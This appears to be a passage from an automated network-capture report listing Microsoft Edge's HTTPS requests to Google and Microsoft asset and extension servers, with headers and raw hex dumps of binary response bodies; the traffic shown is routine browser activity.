                                                                                        2024-07-24 05:14:44 UTC2060INData Raw: 7b 22 66 22 3a 22 72 61 66 22 2c 22 76 22 3a 22 31 2e 30 22 2c 22 72 64 72 22 3a 5b 7b 22 63 22 3a 22 41 6e 61 68 65 69 6d 20 50 61 73 73 77 6f 72 64 20 4d 6f 6e 69 74 6f 72 22 2c 22 75 22 3a 22 43 6f 6e 73 65 6e 74 20 53 61 76 65 20 50 61 73 73 77 6f 72 64 22 7d 5d 2c 22 61 64 22 3a 7b 22 54 49 54 4c 45 5f 53 41 56 45 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 22 2c 22 54 49 54 4c 45 5f 55 50 44 41 54 45 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 22 2c 22 54 49 54 4c 45 5f 53 41 56 45 44 5f 50 41 53 53 57 4f 52 44 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 22 2c 22 54 49 54 4c 45 5f 4e 4f 5f 53 41 56 45 44 5f 50 41 53 53 57 4f 52 44 22 3a 22 53 61 76 65 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64
                                                                                        Data Ascii: {"f":"raf","v":"1.0","rdr":[{"c":"Anaheim Password Monitor","u":"Consent Save Password"}],"ad":{"TITLE_SAVE":"Save your password","TITLE_UPDATE":"Save your password","TITLE_SAVED_PASSWORD":"Save your password","TITLE_NO_SAVED_PASSWORD":"Save your password


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.649780142.251.32.1004432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:44 UTC881OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: www.google.com
                                                                                        Connection: keep-alive
                                                                                        sec-ch-ua: "Not;A=Brand";v="8", "Chromium";v="117", "Google Chrome";v="117"
                                                                                        sec-ch-ua-mobile: ?0
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        sec-ch-ua-arch: "x86"
                                                                                        sec-ch-ua-full-version: "117.0.5938.150"
                                                                                        sec-ch-ua-platform-version: "10.0.0"
                                                                                        sec-ch-ua-full-version-list: "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.150", "Google Chrome";v="117.0.5938.150"
                                                                                        sec-ch-ua-bitness: "64"
                                                                                        sec-ch-ua-model: ""
                                                                                        sec-ch-ua-wow64: ?0
                                                                                        sec-ch-ua-platform: "Windows"
                                                                                        Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                        Sec-Fetch-Site: same-site
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: image
                                                                                        Referer: https://accounts.google.com/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:44 UTC704INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Cross-Origin-Resource-Policy: cross-origin
                                                                                        Cross-Origin-Opener-Policy-Report-Only: same-origin; report-to="static-on-bigtable"
                                                                                        Report-To: {"group":"static-on-bigtable","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/static-on-bigtable"}]}
                                                                                        Content-Length: 5430
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Server: sffe
                                                                                        X-XSS-Protection: 0
                                                                                        Date: Wed, 24 Jul 2024 04:58:55 GMT
                                                                                        Expires: Thu, 01 Aug 2024 04:58:55 GMT
                                                                                        Cache-Control: public, max-age=691200
                                                                                        Last-Modified: Tue, 22 Oct 2019 18:30:00 GMT
                                                                                        Content-Type: image/x-icon
                                                                                        Vary: Accept-Encoding
                                                                                        Age: 949
                                                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                        Connection: close
                                                                                        2024-07-24 05:14:44 UTC686INData Raw: 00 00 01 00 02 00 10 10 00 00 01 00 20 00 68 04 00 00 26 00 00 00 20 20 00 00 01 00 20 00 a8 10 00 00 8e 04 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 30 fd fd fd 96 fd fd fd d8 fd fd fd f9 fd fd fd f9 fd fd fd d7 fd fd fd 94 fe fe fe 2e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd 99 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 95 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 09 fd fd fd c1 ff ff ff ff fa fd f9 ff b4 d9 a7 ff 76 ba 5d ff 58 ab 3a ff 58 aa 3a ff 72 b8 59 ff ac d5 9d ff f8 fb f6 ff ff
                                                                                        Data Ascii: h& ( 0.v]X:X:rY
                                                                                        2024-07-24 05:14:44 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d8 fd fd fd 99 ff ff ff ff 92 cf fb ff 37 52 ec ff 38 46 ea ff d0 d4 fa ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 96 fe fe fe 32 ff ff ff ff f9 f9 fe ff 56 62 ed ff 35 43 ea ff 3b 49 eb ff 95 9c f4 ff cf d2 fa ff d1 d4 fa ff 96 9d f4 ff 52 5e ed ff e1 e3 fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 30 00 00 00 00 fd fd fd 9d ff ff ff ff e8 ea fd ff 58 63 ee ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 35 43 ea ff 6c 76 f0 ff ff ff ff ff ff ff ff ff fd fd fd 98 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd c3 ff ff ff ff f9 f9 fe ff a5 ac f6 ff 5d 69 ee ff 3c 4a eb
                                                                                        Data Ascii: 7R8F2Vb5C;IR^0Xc5C5C5C5C5C5Clv]i<J
                                                                                        2024-07-24 05:14:44 UTC1390INData Raw: ff ff ff ff ff ff ff ff ff ff fd fd fd d0 ff ff ff 08 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fd fd fd 8b ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff b1 d8 a3 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 60 a5 35 ff ca 8e 3e ff f9 c1 9f ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd 87 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 25 fd fd fd fb ff ff ff ff ff ff ff ff ff ff ff ff c2 e0 b7 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 53 a8 34 ff 6e b6 54 ff 9f ce 8d ff b7 da aa ff b8 db ab ff a5 d2 95 ff 7b bc 64 ff 54 a8 35 ff 53 a8 34 ff 77 a0 37 ff e3 89 41 ff f4 85 42 ff f4 85 42 ff fc
                                                                                        Data Ascii: S4S4S4S4S4S4S4S4S4S4S4S4S4S4`5>%S4S4S4S4S4S4nT{dT5S4w7ABB
                                                                                        2024-07-24 05:14:44 UTC1390INData Raw: f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff f4 85 42 ff fb d5 bf ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd ea fd fd fd cb ff ff ff ff ff ff ff ff ff ff ff ff 46 cd fc ff 05 bc fb ff 05 bc fb ff 05 bc fb ff 21 ae f9 ff fb fb ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd c8 fd fd fd 9c ff ff ff ff ff ff ff ff ff ff ff ff 86 df fd ff 05 bc fb ff 05 bc fb ff 15 93 f5 ff 34 49 eb ff b3 b8 f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                        Data Ascii: BBBBBBF!4I
                                                                                        2024-07-24 05:14:44 UTC574INData Raw: ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd d2 fe fe fe 24 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ff 0a fd fd fd 8d fd fd fd fc ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff fd fd fd fb fd fd fd 8b fe fe fe 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fe fe fe 27 fd fd fd 9f fd fd fd f7 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                        Data Ascii: $'


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.649781152.195.19.974432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:44 UTC618OUTGET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1722402874&P2=404&P3=2&P4=QeMQwWp2C6Q0ToOruoUw%2bGiGJE%2f0haB9wFH31GR9DJISupyTNXId4P6Tiwa5VCE%2fWXzF5dUyK7uMMTnFAi8Yig%3d%3d HTTP/1.1
                                                                                        Host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
                                                                                        Connection: keep-alive
                                                                                        MS-CV: F6l/Lp6r3WNuwVmeESVDJW
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:44 UTC632INHTTP/1.1 200 OK
                                                                                        Accept-Ranges: bytes
                                                                                        Age: 1724615
                                                                                        Cache-Control: public, max-age=17280000
                                                                                        Content-Type: application/x-chrome-extension
                                                                                        Date: Wed, 24 Jul 2024 05:14:44 GMT
                                                                                        Etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
                                                                                        Last-Modified: Wed, 24 Jan 2024 00:25:37 GMT
                                                                                        MS-CorrelationId: b4b4aabf-4d02-4629-96b1-a382405b6a31
                                                                                        MS-CV: 642I+iNy0Qp5KFcIV/sUKh.0
                                                                                        MS-RequestId: 5245ac9e-0afd-43ce-8780-5c7d0bedf1d4
                                                                                        Server: ECAcc (nyd/D11E)
                                                                                        X-AspNet-Version: 4.0.30319
                                                                                        X-AspNetMvc-Version: 5.3
                                                                                        X-Cache: HIT
                                                                                        X-CCC: US
                                                                                        X-CID: 11
                                                                                        X-Powered-By: ASP.NET
                                                                                        X-Powered-By: ARR/3.0
                                                                                        X-Powered-By: ASP.NET
                                                                                        Content-Length: 11185
                                                                                        Connection: close
                                                                                        2024-07-24 05:14:44 UTC11185INData Raw: 43 72 32 34 03 00 00 00 1d 05 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 bb 4e a9 d8 c8 e8 cb ac 89 0d 45 23 09 ef 07 9e ab ed 9a 39 65 ef 75 ea 71 bc a5 c4 56 59 59 ef 8c 08 40 04 2b ed 43 d0 dc 6b a7 4f 88 b9 62 4b d3 60 94 de 36 ee 47 92 ab 25 8a 1e cc 0d fa 33 5a 12 19 8e 65 20 5f fd 36 15 d6 13 1e 46 ae 8b 31 70 18 f1 a8 4b 1d 5a ff de 0e 83 8e 11 b2 2f 20 ed 33 88 cb fb 4f 54 94 9e 60 00 d3 bc 30 ab c0 d7 59 8b b0 96 46 54 fc f0 34 33 1c 74 68 d6 79 f9 0c 8c 7d 8a 91 98 ca 70 c6 4c 0f 1b c8 32 53 b9 26 69 cc 60 09 8d 6f ec f9 a6 66 8d 6f 48 81 0e 05 8a f1 97 4e b8 c3 94 3a b3 f7 69 6a 54 89 33 da 9e 46 7b d1 30 bb 2c cc 66 3f 27 66 e3 43 51 74 3b 62 5f 22 50 63 08 e5 20
                                                                                        Data Ascii: Cr240"0*H0NE#9euqVYY@+CkObK`6G%3Ze _6F1pKZ/ 3OT`0YFT43thy}pL2S&i`ofoHN:ijT3F{0,f?'fCQt;b_"Pc


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.64977913.107.246.404432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:44 UTC711OUTGET /assets/domains_config_gz/2.8.75/asset?assetgroup=EntityExtractionDomainsConfig HTTP/1.1
                                                                                        Host: edgeassetservice.azureedge.net
                                                                                        Connection: keep-alive
                                                                                        Edge-Asset-Group: EntityExtractionDomainsConfig
                                                                                        Sec-Mesh-Client-Edge-Version: 117.0.2045.55
                                                                                        Sec-Mesh-Client-Edge-Channel: stable
                                                                                        Sec-Mesh-Client-OS: Windows
                                                                                        Sec-Mesh-Client-OS-Version: 10.0.19045
                                                                                        Sec-Mesh-Client-Arch: x86_64
                                                                                        Sec-Mesh-Client-WebView: 0
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:44 UTC583INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:44 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 79192
                                                                                        Connection: close
                                                                                        Content-Encoding: gzip
                                                                                        Last-Modified: Wed, 22 May 2024 23:09:58 GMT
                                                                                        ETag: 0x8DC7AB44D2CA6C5
                                                                                        x-ms-request-id: 9b20c30d-901e-000f-1259-dd85f1000000
                                                                                        x-ms-version: 2009-09-19
                                                                                        x-ms-lease-status: unlocked
                                                                                        x-ms-blob-type: BlockBlob
                                                                                        x-azure-ref: 20240724T051444Z-15b94bb6ff9hxhccwyhqf48dan000000009g000000009u0v
                                                                                        Cache-Control: public, max-age=604800
                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-07-24 05:14:44 UTC15801INData Raw: 1f 8b 08 08 46 7b 4e 66 02 ff 61 73 73 65 74 00 ec bd 0b 97 db 36 b2 30 f8 57 b2 b9 33 b3 dd 89 d5 d6 5b dd d9 cd fa f4 d3 f1 f8 39 6d 3b 19 db f1 d5 01 49 48 a2 45 91 0c 1f 6a ab c3 be bf 7d 0b 05 80 00 08 50 52 db ce 77 ef b7 67 67 9c 16 09 14 0a 40 a1 50 a8 2a 14 c0 3f bf f7 93 78 16 ce bf ff e9 bb 3f bf 2f 92 25 8d a7 51 b8 0a 0b 78 ef 8d bb dd 07 df 7d 9f 92 39 9d fa 65 91 cc 66 90 38 1c f4 59 62 40 67 a4 8c 8a 69 94 f8 24 a2 d3 15 49 11 81 c7 f0 c0 df 0e 3c 00 94 97 e3 6b de f1 08 7b a5 11 7b a5 51 67 9e e1 6b 8c af 71 a7 cc f1 15 81 69 de 59 7d c6 d7 02 5f 8b 0e a5 ec d5 c7 5c 3f ef f8 b7 ec 35 20 ec 35 20 9d 60 89 af 14 5f 69 27 40 e0 19 e6 ce 48 27 c4 8a 66 21 be 86 1d 78 60 af 19 be 66 9d 19 e6 2e b0 ec 82 76 c2 08 5f 31 77 91 75 16 3c b7 c4 d7
                                                                                        Data Ascii: F{Nfasset60W3[9m;IHEj}PRwgg@P*?x?/%Qx}9ef8Yb@gi$I<k{{QgkqiY}_\?5 5 `_i'@H'f!x`f.v_1wu<
                                                                                        2024-07-24 05:14:44 UTC16384INData Raw: 4a b0 09 cb 82 45 ac c5 f3 e8 07 bb 82 71 ba da 2a 0b c7 62 2c 30 96 c2 52 09 74 65 c0 2a 8a c3 88 95 9c 7c 3e a9 79 09 d4 fa 9a 9f 30 4a 49 28 2b d7 97 ff 7a 7b f9 fa cd f4 c9 05 68 2b 37 9c c1 08 01 cb 2f 28 f3 02 34 de 08 0c a6 34 da 38 c6 ec 48 27 33 28 96 9f 45 d9 4f 9f 12 f7 54 d2 47 a6 39 87 08 81 e9 6d 4f c1 43 97 10 bf ad 59 55 67 39 13 fe 1e 05 67 65 16 87 6c 9b f5 cb 90 60 eb 3d ea 25 09 33 8b f9 4a fb 10 ef 11 3b 7c e8 61 60 14 a0 60 b9 7c 16 e7 69 54 b1 c3 22 c0 e0 29 df c2 05 4c 8f bc f0 67 5e 04 75 33 51 9a b7 e1 61 1a 61 48 f5 c3 30 f7 62 91 d5 a8 34 39 2a 97 ff 2d f5 aa c1 c2 6c 78 e0 35 33 d1 42 b3 75 c4 be 3b f4 d0 68 83 51 a7 81 2d a0 ff 0d 5d 10 62 ed 7f 55 a5 99 9f 25 2b 2f a4 4d 09 21 65 43 c7 04 cf 93 19 f3 c1 d0 b6 e9 14 38 59 31
                                                                                        Data Ascii: JEq*b,0Rte*|>y0JI(+z{h+7/(448H'3(EOTG9mOCYUg9gel`=%3J;|a``|iT")Lg^u3QaaH0b49*-lx53Bu;hQ-]bU%+/M!eC8Y1
                                                                                        2024-07-24 05:14:44 UTC16384INData Raw: 2f 4d 35 19 b9 3f d5 c1 f4 52 a7 67 b3 99 ff bc b7 c2 8e 7c d3 4d 9a a5 bf dc f0 20 15 b1 bc 1f 82 9a 8d 98 a7 af db 80 6b 74 e7 ab 7c e6 18 7d 9a 2b 3e 34 2d 1a e7 c0 d5 e8 b4 a0 0e d4 7d 19 bb 69 52 58 a2 33 32 78 db 4b 2d cd 54 dd d2 2b 9c a0 29 69 1a ba 4a ee 0a 4d 33 5a 7b a7 1a 83 5f f3 f7 fe 2c 2f 84 3b 39 d0 56 82 ef 75 a4 f3 69 57 af 58 09 8c 2a 1d 24 b9 4e 6b cf 63 d0 74 99 e3 02 0f 26 7f 1a 86 a9 a8 69 fa 5a d8 25 83 c1 ea f8 fd 12 62 16 86 38 17 5a 19 6f 13 03 00 e6 6a 07 a4 40 be bb 20 de a6 de bf d1 06 75 32 1f c3 4f 67 41 ad 31 bd b0 9c ee 44 47 33 2a 92 9c d3 f6 35 64 a9 b1 d3 f6 b1 c7 a7 b4 80 af ea c1 2a 6c dd 81 a0 0b 67 ca d2 b2 11 7c 8d dc 39 47 56 d1 bd 08 e8 ec 3e 4f c9 56 d6 7a d3 9a 56 4d 17 50 41 9b 17 9b 37 36 da 2e 7c a4 ba 63
                                                                                        Data Ascii: /M5?Rg|M kt|}+>4-}iRX32xK-T+)iJM3Z{_,/;9VuiWX*$Nkct&iZ%b8Zoj@ u2OgA1DG3*5d*lg|9GV>OVzVMPA76.|c
                                                                                        2024-07-24 05:14:44 UTC16384INData Raw: 99 dc 5a 2e 69 cf 52 41 9e 48 c8 71 d7 39 94 dd f7 b6 3f 2a 48 d1 b5 2e 37 a4 97 5f 43 54 c9 8d d7 76 7a 14 e4 6f 3b 80 f7 6a 61 e8 6f 47 e9 2d cb 60 84 66 2b c0 b9 77 09 1b c0 32 5c aa 6c 0e 25 81 ed a0 5e 61 25 37 6f 3c a5 bc 1f 04 1a dd b1 04 1d c9 73 16 3a 58 a8 69 4d 12 c1 5e e9 66 5f 14 6c e4 9e d4 61 25 e1 2f c3 fc b8 ed df 80 5d 2b 3a 5b 4c 56 c9 72 1f 59 1d 6a 72 0b d2 b0 4c 8e d5 67 db 16 79 41 90 65 4f 4b 68 63 f6 d1 e5 db b6 6a 18 e6 ca 5f 04 79 2e 71 69 5d 0e 19 cc d9 f6 58 27 58 af 1c 18 04 f1 98 d2 bf 15 1e 37 ce e0 1e 88 54 83 3c 82 f8 a8 05 5f b0 1b 3f 2f 02 8f 31 a4 e9 1d ed 45 e6 e4 85 e6 b9 66 4c fd cd 8d e4 58 f7 79 73 8b 47 40 25 b6 0d 7f 78 ff a8 fe e7 7d 69 4a fc 00 c7 b0 37 a9 44 f0 40 1e e8 bd 41 8a b4 0a 5d 5a 2c 0e 60 f7 fb 81
                                                                                        Data Ascii: Z.iRAHq9?*H.7_CTvzo;jaoG-`f+w2\l%^a%7o<s:XiM^f_la%/]+:[LVrYjrLgyAeOKhcj_y.qi]X'X7T<_?/1EfLXysG@%x}iJ7D@A]Z,`
                                                                                        2024-07-24 05:14:44 UTC14239INData Raw: 96 38 e6 e1 28 aa 7a 68 03 ee 80 b5 3b 12 61 75 e9 1b 80 49 37 e3 81 63 57 87 03 5d 30 c4 2c 68 be 29 95 24 e0 73 e2 94 ba 7c 22 47 ea b4 f3 4a ab de 10 bb 0f 22 b0 e3 03 f1 16 c4 09 e2 54 66 ca 62 e0 bd 45 b4 68 87 69 72 a9 a8 3a 28 8c ad c8 95 24 60 28 0b c5 a8 db e3 d5 17 cd 43 46 b4 fb 46 fd a3 14 49 08 2b a0 d4 0b 48 65 a7 34 02 ce 86 25 ec 4d 18 c8 06 95 b7 db ae 2c d4 04 dd 90 c7 1a 26 c2 da 18 8e c3 e7 b6 d0 48 5c c7 b0 14 4c 7c f1 b4 2a ac 33 ac 8a 9e 31 0d 6c 3e aa 0c 15 a1 45 32 ac 4e d6 6f ba 9a 27 26 95 df 33 99 0b 20 7d af b2 62 2d 9c ea d1 32 e1 30 9b 8a 31 68 6d 15 9c 98 ab c8 c6 e3 7e e5 00 84 e0 e3 a8 2a 88 4f 2a 47 73 00 26 98 78 bc 7a 46 b8 72 83 b9 60 67 8e 22 40 d7 fa c3 ee f3 d0 41 41 2f 43 d3 eb 75 57 f1 23 82 0d a8 53 cf 60 24 25
                                                                                        Data Ascii: 8(zh;auI7cW]0,h)$s|"GJ"TfbEhir:($`(CFFI+He4%M,&H\L|*31l>E2No'&3 }b-201hm~*O*Gs&xzFr`g"@AA/CuW#S`$%


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.64978413.107.246.404432832C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-07-24 05:14:45 UTC470OUTGET /assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Shoreline HTTP/1.1
                                                                                        Host: edgeassetservice.azureedge.net
                                                                                        Connection: keep-alive
                                                                                        Edge-Asset-Group: Shoreline
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: no-cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                        2024-07-24 05:14:45 UTC584INHTTP/1.1 200 OK
                                                                                        Date: Wed, 24 Jul 2024 05:14:45 GMT
                                                                                        Content-Type: application/octet-stream
                                                                                        Content-Length: 306698
                                                                                        Connection: close
                                                                                        Content-Encoding: gzip
                                                                                        Last-Modified: Tue, 10 Oct 2023 17:24:31 GMT
                                                                                        ETag: 0x8DBC9B5C40EBFF4
                                                                                        x-ms-request-id: e50e4f1d-901e-000f-6dbc-dc85f1000000
                                                                                        x-ms-version: 2009-09-19
                                                                                        x-ms-lease-status: unlocked
                                                                                        x-ms-blob-type: BlockBlob
                                                                                        x-azure-ref: 20240724T051445Z-15b94bb6ff9f5mm5g2kn1xpxws00000002kg00000000a80h
                                                                                        Cache-Control: public, max-age=604800
                                                                                        x-fd-int-roxy-purgeid: 69316365
                                                                                        X-Cache: TCP_HIT
                                                                                        X-Cache-Info: L1_T2
                                                                                        Accept-Ranges: bytes
                                                                                        2024-07-24 05:14:45 UTC15800INData Raw: 1f 8b 08 08 cf 88 25 65 02 ff 61 73 73 65 74 00 ec 7d 69 93 db 46 92 e8 5f a9 f0 97 fd e0 96 05 10 00 09 4c c4 8b 17 2d f9 92 6d f9 92 6d 8d fd 66 43 51 00 0a 24 9a 20 40 e1 60 ab 7b 76 fe fb ab cc 2c 10 09 82 07 c8 a6 bc 9e 8d 0d 5b 68 b0 8e bc eb 44 55 e6 3f 3f 59 c9 3c 4d 54 55 bf db a8 b2 4a 8b fc 93 bf 89 4f dc cf ac cf ac 4f 6e c4 27 8b 26 7c 27 d7 eb 4a 27 fe bf 7f 7e 92 c6 90 19 c5 ee d4 f7 65 f0 4c f9 be ff cc f5 95 7c 26 63 df 7e 36 9b da 81 13 7b d3 d0 0e 15 d4 cd e5 4a 41 f9 77 ef 5e bf f9 ea 1d fc 7a f7 0e d2 19 1e fb 33 fd df 0c 12 63 55 45 65 ba ae 4d 06 d5 61 89 54 75 a9 1e 20 f7 f5 ab 57 2f 5e dd dd 7e ff 62 be 7c bf 58 a6 5f 05 f7 d6 8b db 9f be f8 f2 f6 f6 87 97 b7 3f f9 b7 90 ff 72 fe ad 7e ff e2 76 9d 58 77 ee 57 8b 1f de ff 14 f9 fe
                                                                                        Data Ascii: %easset}iF_L-mmfCQ$ @`{v,[hDU??Y<MTUJOOn'&|'J'~eL|&c~6{JAw^z3cUEeMaTu W/^~b|X_?r~vXwW
                                                                                        2024-07-24 05:14:45 UTC16384INData Raw: a5 38 7d a8 02 c7 0a 04 ba b8 75 26 ce 55 c2 08 bf 5c 90 e7 68 0d 8c 7c 07 bb 14 ee 07 cf ac 5b ca 81 54 5b 25 f6 36 51 93 15 e8 c2 2b 22 50 fc 52 36 6d 55 35 59 19 67 e4 56 be d8 2d df fd 8c 1c b1 48 e9 85 d8 d5 6f a1 88 16 05 b8 ea d5 42 20 2f c6 fa c5 ab 21 ae b4 7e 71 4c 7c 69 3b da be 2c c4 3c 45 31 58 f6 5a d0 75 29 2d 10 91 2f b6 81 a8 f1 77 27 4d cb 46 c3 d1 f2 cb e7 17 7d 3c d0 6a 30 b1 ed 19 11 24 85 30 ed b3 77 98 0a a3 d3 4d 8a a4 58 a6 1a 92 6f 39 a0 66 5b a9 58 c4 f8 d7 db 13 a4 38 9f 53 18 72 e3 d6 58 c9 9c 2a 85 f1 21 3d 9d 12 35 51 d6 f4 74 9e 6e f9 3a 6f 4c fc e5 2c 53 f9 7a 94 a9 7c 50 ab 8e d8 56 01 86 95 11 92 ce 4d 82 a9 12 26 c6 7f 9c 55 b4 0d eb a8 c4 4f 75 f1 df 12 7e 7b 85 2d 18 bd 99 6f 4d 95 18 8d 35 7f b9 51 da bc b3 17 f2 61
                                                                                        Data Ascii: 8}u&U\h|[T[%6Q+"PR6mU5YgV-HoB /!~qL|i;,<E1XZu)-/w'MF}<j0$0wMXo9f[X8SrX*!=5Qtn:oL,Sz|PVM&UOu~{-oM5Qa
